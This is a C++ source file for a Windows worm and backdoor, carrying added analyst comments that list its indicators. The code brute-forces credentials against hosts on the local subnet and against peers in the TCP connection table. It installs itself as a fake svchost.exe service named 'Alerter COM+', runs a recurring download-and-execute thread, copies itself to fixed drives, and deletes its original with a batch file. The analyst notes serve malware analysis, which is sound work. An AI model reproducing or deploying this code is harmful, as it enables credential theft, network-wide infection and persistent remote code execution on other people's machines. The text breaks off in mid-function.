📄 webdown.cpp
char szHostName[128]; //将本机的名称存入一维数组,数组名称为szHostName
struct hostent * pHost; //定义结构体 hostent
int i; //定义变量i
LVITEM lvi;
lvi.mask=LVIF_IMAGE|LVIF_TEXT;
lvi.iItem=0;
lvi.iSubItem=0;
lvi.iImage=0;
if(gethostname(szHostName,128)==0) //如果本机的名称查到,则将其名称送入List控件
{
pHost = gethostbyname(szHostName);
for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ )
{
CString IPAddress = inet_ntoa (*(struct in_addr *)pHost->h_addr_list[i]);
CString cccc = jian1(IPAddress);
for(int j = 2; j < 255; j ++)
{
CString ddd;
ddd.Format("%s%d", cccc, j);
if(ddd.CompareNoCase(IPAddress) != 0)
{
for(int mm = 0;user[mm]; mm++)
{
for (int k=0;pass[k];k++)
{
ConnectRemote(ddd, user[mm], pass[k]);
}
}
}
}
}
}
WSACleanup();
}
// Reads this host's IPv4 TCP connection table through iphlpapi.dll and, for
// every remote peer that is not 0.0.0.0 or 127.0.0.1, calls ConnectRemote()
// once per user[] / pass[] combination.
//
// Returns 0 on every path (FALSE and 0 are the same value), so a caller cannot
// tell success from failure.
//
// Analyst notes:
//  - pGetTcp, pGetUdp, pEtyTcp, pTcpBuf, mibtcp, user, pass and ConnectRemote
//    are not declared in this function; presumably file-level — confirm
//    against the rest of the file.
//  - ConnectRemote is outside this view. The original comment calls the loop
//    "user name and password enumeration"; if it performs authenticated
//    connections, expect a burst of failed logons from one source against
//    hosts it already had TCP sessions with — confirm against ConnectRemote.
int TCPConnect()
{
pGetTcp=NULL;
pGetUdp=NULL;
pEtyTcp=NULL;
// This assignment precedes the local declaration below, so it targets an outer
// hInst that is not visible here (presumably a global); the local shadows it.
hInst=NULL;
HINSTANCE hInst = LoadLibrary("iphlpapi.dll");
if(hInst==NULL) return FALSE;
// Resolve the IP Helper entry points at run time instead of linking them.
pGetTcp = (GetTcpTableFun)GetProcAddress(hInst, "GetTcpTable");
if(pGetTcp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return FALSE;
}
pGetUdp=(GetUdpTableFun)GetProcAddress(hInst,"GetUdpTable");
if(pGetUdp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return FALSE;
}
// SetTcpEntry is resolved but not called anywhere in this function.
pEtyTcp=(SetTcpEntryFun)GetProcAddress(hInst,"SetTcpEntry");
if(pEtyTcp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return FALSE;
}
// Both pointers were already checked above, so this branch cannot be taken.
if(pGetTcp==NULL ||pGetUdp==NULL)
{
if (hInst!=NULL) FreeLibrary(hInst);
return 0;
}
// netstat-style infection: the peers of existing connections become targets
// Most of the locals below (strStatus, strTmp, pUdpBuf, addrLoc, szLocAddr,
// dwLocIP, nLocalPort, nRemotePort) are never used in this function.
CString strStatus,strTmp;
BYTE pUdpBuf[100*8+4];
DWORD dwTableSize;
DWORD lret;
int i,k=0;
in_addr addrLoc,addrRem;
char szLocAddr[100],szRemAddr[100];
DWORD dwLocIP,dwRemIP;
unsigned short nLocalPort,nRemotePort;
// Size passed to GetTcpTable; the real size of pTcpBuf is not visible here.
dwTableSize=100*20+4;
lret=pGetTcp((PMIB_TCPTABLE)pTcpBuf,&dwTableSize,FALSE);
if (lret != NO_ERROR)
{
if (hInst!=NULL) FreeLibrary(hInst);
return 0;
}
mibtcp=(PMIB_TCPTABLE)pTcpBuf;
// k is dwNumEntries-1 and the loop runs while i<k, so the last table row is
// not visited.
k=(int)mibtcp->dwNumEntries-1;
for(i=0;i<k;i++){
// htonl followed by ntohl cancels out: S_addr ends up equal to dwRemoteAddr.
dwRemIP=htonl(mibtcp->table[i].dwRemoteAddr);
addrRem.S_un.S_addr = ntohl(dwRemIP);
strcpy(szRemAddr, inet_ntoa(addrRem));
// Check whether the address is local: skip 0.0.0.0 and 127.0.0.1
if(strcmp(szRemAddr, "0.0.0.0") != 0 && strcmp(szRemAddr, "127.0.0.1") != 0)
{// enumerate user name / password pairs for the connection
for(int mm = 0;user[mm]; mm++)
{
for (int j=0;pass[j];j++)
{
// Return value is ignored here, so every pair is tried for every peer.
ConnectRemote(szRemAddr, user[mm], pass[j]);
}
}
}
}
if (hInst!=NULL) FreeLibrary(hInst);
return 0;
}
// Thread procedure that repeats three target-discovery routines forever, with
// a 20-minute sleep between rounds. dParam is unused. ServiceMain starts it
// when modify_data.IsShare is set.
//
// Analyst note: the fixed 20*60000 ms interval means any network activity
// produced by the three calls should recur on a roughly 20-minute period plus
// the run time of the round, which is useful when correlating logs.
// QueryLocalIP and getipfun are defined outside this view.
unsigned long CALLBACK TCP_thread(LPVOID dParam)
{
while(1)
{
// intranet (local subnet) IPs
QueryLocalIP();
// external network
getipfun();
// netstat: peers taken from the TCP connection table
TCPConnect();
Sleep(20*60000);
}
// Unreachable: the loop above has no exit.
return 0;
}
// Thread procedure that calls DownExec(modify_data.DownFile) forever, sleeping
// modify_data.WaitTime minutes between calls. dParam is unused. ServiceMain
// starts this thread unconditionally.
//
// Analyst note: DownExec is defined outside this view; its name suggests
// download-and-execute — confirm. DownFile and WaitTime come from the
// modify_data record that WinMain decrypts, so they are per-sample
// configuration rather than constants in this code.
unsigned long CALLBACK DOWN_thread(LPVOID dParam)
{
while(1)
{
// (original comment said "intranet IP"; it does not describe this call)
DownExec(modify_data.DownFile);
Sleep(modify_data.WaitTime*60*1000);
}
// Unreachable: the loop above has no exit.
return 0;
}
// Thread procedure that sweeps the local subnet: it takes the first three
// octets of one of this host's IPv4 addresses, pings x.y.z.1 .. x.y.z.253 and,
// for each address that answers, calls ConnectRemote() with the user[] /
// pass[] lists. dParam is unused.
//
// Returns FALSE if Winsock 2.2 is not reported, otherwise 0 after one sweep.
//
// Analyst notes:
//  - Network signature: sequential pings across a subnet from one host, each
//    reply followed by repeated ConnectRemote calls to the responder.
//    ConnectRemote is outside this view; the original comment calls this
//    "user name and password enumeration" — confirm what protocol it uses.
//  - CPingI, user, pass and ConnectRemote are declared elsewhere.
unsigned long CALLBACK IPC_thread(LPVOID dParam)
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;
wVersion = MAKEWORD(2,2);
// errret is stored but never checked; only the reported version is tested.
errret = WSAStartup(wVersion,&wsaData);
if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
// MessageBox(NULL,"Winsock library version too low","Notice",MB_OK);
// This path returns without calling WSACleanup.
return FALSE;
}
/* Get the computer name */
CHAR szHostName[128]={0}; // buffer that receives the local host name
struct hostent * pHost; // host entry returned by gethostbyname
int i; // index into the address list
SOCKADDR_IN saddr;
if(gethostname(szHostName,128)==0) // if the local host name was obtained,
{
pHost = gethostbyname(szHostName);
// Each iteration overwrites saddr, so the last address in the list wins.
for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ )
{
memset(&saddr,0,sizeof(saddr));
memcpy(&saddr.sin_addr.s_addr, pHost->h_addr_list[i], pHost->h_length);
}
}
// saddr is only written inside the loop above; if no address was found it is
// read below without having been initialised.
char ip[128];
int count;
BOOL bpingOK=FALSE;
// Host part runs from 1 to 253 and does not exclude this host's own address.
for(count=1;count<254;count++)
{
memset(ip,0,128);
sprintf(ip,
"%d.%d.%d.%d",
saddr.sin_addr.S_un.S_un_b.s_b1,
saddr.sin_addr.S_un.S_un_b.s_b2,
saddr.sin_addr.S_un.S_un_b.s_b3,
count);
CPingI m_PingI;
// Meaning of the arguments (2, ip, NULL) depends on CPingI::Ping, which is
// not visible here.
bpingOK = m_PingI.Ping(2,(LPCSTR)ip,NULL);
if (bpingOK)
{// enumerate user name / password pairs for the connection
for(int i = 0;user[i]; i++)
{
for (int j=0;pass[j];j++)
{
// A return of 0 ends the password loop for this user only; the outer
// loop still moves on to the next user name.
if (ConnectRemote(ip,user[i],pass[j])==0)
break;
}
}
}
}
WSACleanup();
//printf("Hello World!\n");
return 0;
}
//=====================================================================
//***********************************************// Self-deletion
// Self-deletion helper: writes a batch file named rs.bat into the directory
// returned by GetTempPath, then starts the command interpreter on it with the
// running executable's path as the batch file's %1 argument. The batch text
// loops on "del" until %1 no longer exists.
//
// Analyst notes (host artefacts visible in this function):
//  - a file rs.bat created in the temp directory; WriteFile is given a fixed
//    length of 105 bytes, so the file on disk is at most 105 bytes;
//  - a child process whose command line is "%comspec% /c <temp>\rs.bat
//    <path of this executable>" after environment expansion, created with
//    DETACHED_PROCESS.
//  No return value of WriteFile, GetModuleFileName or CreateProcess is checked.
void uninstall(void)//Thanks to Spybot
{
char batfile[MAX_PATH];
char tempdir[MAX_PATH];
char tcmdline[MAX_PATH];
char cmdline[MAX_PATH];
char This_File[MAX_PATH];
HANDLE f;
DWORD r;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
GetTempPath(sizeof(tempdir), tempdir);
sprintf(batfile, "%s\\rs.bat", tempdir);
// CREATE_ALWAYS: an existing rs.bat in the temp directory is overwritten.
f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
if (f != INVALID_HANDLE_VALUE)
{
// write a batch file to remove our executable once we close
WriteFile(f, "@echo off\r\n"
":start\r\nif not exist \"\"%1\"\" goto done\r\n"
"del /F \"\"%1\"\"\r\n"
"del \"\"%1\"\"\r\n"
"goto start\r\n"
":done\r\n"
"del /F %temp%\rs.bat\r\n"
"del %temp%\r.bat\r\n", 105, &r, NULL);
CloseHandle(f);
memset(&sinfo, 0, sizeof(STARTUPINFO));
sinfo.cb = sizeof(sinfo);
sinfo.wShowWindow = SW_HIDE;
memset(This_File,0,sizeof(This_File));
GetModuleFileName(NULL, This_File, sizeof(This_File));
// Neither path is quoted in the command line built here.
sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, This_File); // build command line
ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line
// execute the batch file
// pinfo's process and thread handles are not closed afterwards.
CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
}
}
// Program entry point. Two phases:
//  1. If the running image is not <system directory>\IME\svchost.exe, copy
//     itself there, start the copy, call uninstall() to remove the original,
//     and exit.
//  2. Otherwise decrypt the modify_data configuration record and hand control
//     to the service control dispatcher under the service name "Alerter COM+";
//     if the dispatcher call fails, call InstallService().
//
// Returns -1 if the copy fails, otherwise nRetCode (0).
//
// Analyst notes (indicators taken from this function):
//  - file: an executable named svchost.exe inside the IME subdirectory of the
//    system directory, rather than in the system directory itself;
//  - process: that file started with the system directory as working directory;
//  - service name string: "Alerter COM+";
//  - configuration: modify_data is decrypted in place by DecryptRecord with the
//    key string "1314". DecryptRecord, SetFileAttrib, ServiceMain and
//    InstallService are defined outside this function.
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
int nRetCode = 0;
/// Self-copy ----------------------
char SysDirBuff[256];
char filename[256];
char This_File[256];
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
strcpy(filename,SysDirBuff);
strcat(filename,"\\IME\\svchost.exe");
GetModuleFileName(NULL, This_File, sizeof(This_File));
// Case-insensitive comparison of the running image path with the install path.
if (_stricmp(This_File,filename)!=0)
{
// Any file already at the install path is deleted, then replaced.
DeleteFile(filename);
if(::CopyFile(This_File,filename,FALSE)==0) return -1;
SetFileAttrib(filename);// if it is hidden, can it not be copied??
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo,0,sizeof(pinfo));
memset(&sinfo,0,sizeof(sinfo));
// sinfo.cb is left at 0 by the memset; the result of CreateProcess is not checked.
CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
uninstall();
ExitProcess(0);
}
// Decryption of the configuration record
DecryptRecord((char*)&modify_data,sizeof(MODIFY_DATA),"1314");
// Service entry table -----------------------------------
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName="Alerter COM+"; // service name
service_tab_entry[0].lpServiceProc=ServiceMain; // service entry point
// There may be several entries; the last one must be NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
// The dispatcher call returns 0 on failure; the original comment calls this
// case "first run", and it leads to InstallService().
if (StartServiceCtrlDispatcher(service_tab_entry)==0)// first run
{
InstallService();
}
return nRetCode;
}
/***********************************************/
// The service's actual entry point function
// Service entry point registered by WinMain for "Alerter COM+". It reports the
// service as running, enforces a single instance with a named mutex, then
// starts the worker threads selected by flags in the decrypted modify_data
// record, optionally copies itself to fixed drives, and calls CreateMyWindow().
// dwArgc and lpszArgv are unused.
//
// Analyst notes (indicators and behaviour visible here):
//  - named mutex "Alerter COM+" (same string as the service name); a second
//    instance exits as soon as it sees ERROR_ALREADY_EXISTS;
//  - the service accepts STOP and PAUSE/CONTINUE controls;
//  - which propagation threads run depends on the IsWorm, IsARP, IsShare and
//    IsUpan flags, so behaviour differs between configured samples;
//  - Bind_thread, ARP_thread, CopyToUAndSet, CreateMyWindow, Handler,
//    service_status_ss and handle_service_status are defined outside this
//    function.
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
service_status_ss.dwServiceType=SERVICE_WIN32;
service_status_ss.dwCurrentState=SERVICE_START_PENDING;
service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
service_status_ss.dwServiceSpecificExitCode=0;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
service_status_ss.dwWin32ExitCode=0;
// A failed registration is ignored: the branch is empty and execution continues
// with a zero handle.
if ((handle_service_status=RegisterServiceCtrlHandler("Alerter COM+",Handler))==0)
{
//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
}// one control handler per service
service_status_ss.dwCurrentState=SERVICE_RUNNING;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
::SetServiceStatus(handle_service_status,&service_status_ss);
// Create the mutex -----------------------------------
HANDLE m_hMutex=CreateMutex(NULL,FALSE,"Alerter COM+");
// Check the error code
if(GetLastError()==ERROR_ALREADY_EXISTS)
{
// The mutex already exists: close the handle and reset the variable
CloseHandle(m_hMutex);
m_hMutex=NULL;
// Exit the process
ExitProcess(0);
}
// Start the infection thread ----------------------------
// The thread handles returned by CreateThread below are all discarded.
if (modify_data.IsWorm)//
{
::CreateThread(NULL,0,Bind_thread,NULL,0,NULL);
}
// Start ARP infection
if (modify_data.IsARP)//
{
::CreateThread(NULL,0,ARP_thread,NULL,0,NULL);
}
// Start propagation over IPC shares ---------------------------------------
if (modify_data.IsShare)//
{
::CreateThread(NULL,0,TCP_thread,NULL,0,NULL);
}
// The download thread is started regardless of any flag.
::CreateThread(NULL,0,DOWN_thread,NULL,0,NULL);
// Copy the file to each drive
if(modify_data.IsUpan)
{// Walk drive letters C to Z and infect each disk.
for (char cLabel='c'; cLabel<='z'; cLabel++)
{
char strRootPath[] = {"c:\\"};
strRootPath[0] = cLabel;
// Only roots that report DRIVE_FIXED are passed to CopyToUAndSet.
if(GetDriveType(strRootPath)== DRIVE_FIXED)
{
CopyToUAndSet(strRootPath);
}
}
}
CreateMyWindow();
return ;
}
/***********************************************/
// Service control handler
// Service control handler registered by ServiceMain. It maps STOP, CONTINUE
// and PAUSE controls to the matching dwCurrentState value in the shared
// service_status_ss record and reports it with SetServiceStatus.
//
// Analyst note: the handler only changes the reported state. Nothing in this
// function signals or stops the worker threads that ServiceMain created, so a
// PAUSED state reported to the service control manager does not by itself show
// that those threads have stopped.
void WINAPI Handler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
service_status_ss.dwCurrentState=SERVICE_STOPPED;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_CONTINUE:
service_status_ss.dwCurrentState=SERVICE_RUNNING;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_PAUSE:
service_status_ss.dwCurrentState=SERVICE_PAUSED;
::SetServiceStatus(handle_service_status,&service_status_ss);
break;
case SERVICE_CONTROL_INTERROGATE:
// No state change; the current status is reported by the call after the switch.
break;
}
// Reported again here, so STOP/CONTINUE/PAUSE send the same status twice.
::SetServiceStatus(handle_service_status,&service_status_ss);
}
/***********************************************/
bool InstallService()
{
DWORD dwErrorCode;
char szSysDir[256];
memset(szSysDir,0,sizeof(szSysDir));
::GetSystemDirectory(szSysDir,sizeof(szSysDir));
strcat(szSysDir,"\\IME\\svchost.exe");
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);//打开服务控制管理器数据库